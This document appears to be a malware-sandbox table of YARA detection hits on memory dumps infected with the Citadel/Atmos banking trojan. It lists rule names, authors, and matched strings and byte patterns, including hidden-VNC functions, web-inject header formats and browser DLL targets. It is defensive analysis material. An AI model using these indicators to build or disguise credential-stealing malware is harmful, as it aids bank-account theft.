34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
18.0.RuntimeBroker.exe.900000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
18.0.RuntimeBroker.exe.900000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
18.0.RuntimeBroker.exe.900000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
18.0.RuntimeBroker.exe.900000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 90 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 90 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 90 00
18.0.RuntimeBroker.exe.900000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
9.3.RuntimeBroker.exe.110000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
9.3.RuntimeBroker.exe.110000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
9.3.RuntimeBroker.exe.110000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
9.3.RuntimeBroker.exe.110000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 11 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 11 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 11 00
9.3.RuntimeBroker.exe.110000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
17.0.RuntimeBroker.exe.3d0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
17.0.RuntimeBroker.exe.3d0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
17.0.RuntimeBroker.exe.3d0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
17.0.RuntimeBroker.exe.3d0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 3D 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 3D 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 3D 00
17.0.RuntimeBroker.exe.3d0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
9.3.RuntimeBroker.exe.110000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
9.3.RuntimeBroker.exe.110000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
9.3.RuntimeBroker.exe.110000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
9.3.RuntimeBroker.exe.110000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 11 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 11 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 11 00
9.3.RuntimeBroker.exe.110000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
5.3.ctfmon.exe.a50000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
5.3.ctfmon.exe.a50000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
5.3.ctfmon.exe.a50000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
5.3.ctfmon.exe.a50000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A5 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A5 00
5.3.ctfmon.exe.a50000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
15.3.smartscreen.exe.290000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
15.3.smartscreen.exe.290000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
15.3.smartscreen.exe.290000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
15.3.smartscreen.exe.290000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 29 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 29 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 29 00
15.3.smartscreen.exe.290000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
28.0.RuntimeBroker.exe.810000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
28.0.RuntimeBroker.exe.810000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
25.0.dllhost.exe.ac0000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
25.0.dllhost.exe.ac0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
28.0.RuntimeBroker.exe.810000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
28.0.RuntimeBroker.exe.810000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 81 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 81 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 81 00
28.0.RuntimeBroker.exe.810000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
25.0.dllhost.exe.ac0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
25.0.dllhost.exe.ac0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
25.0.dllhost.exe.ac0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0.2.services.png.exe.400000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0.2.services.png.exe.400000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0.2.services.png.exe.400000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
0.2.services.png.exe.400000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
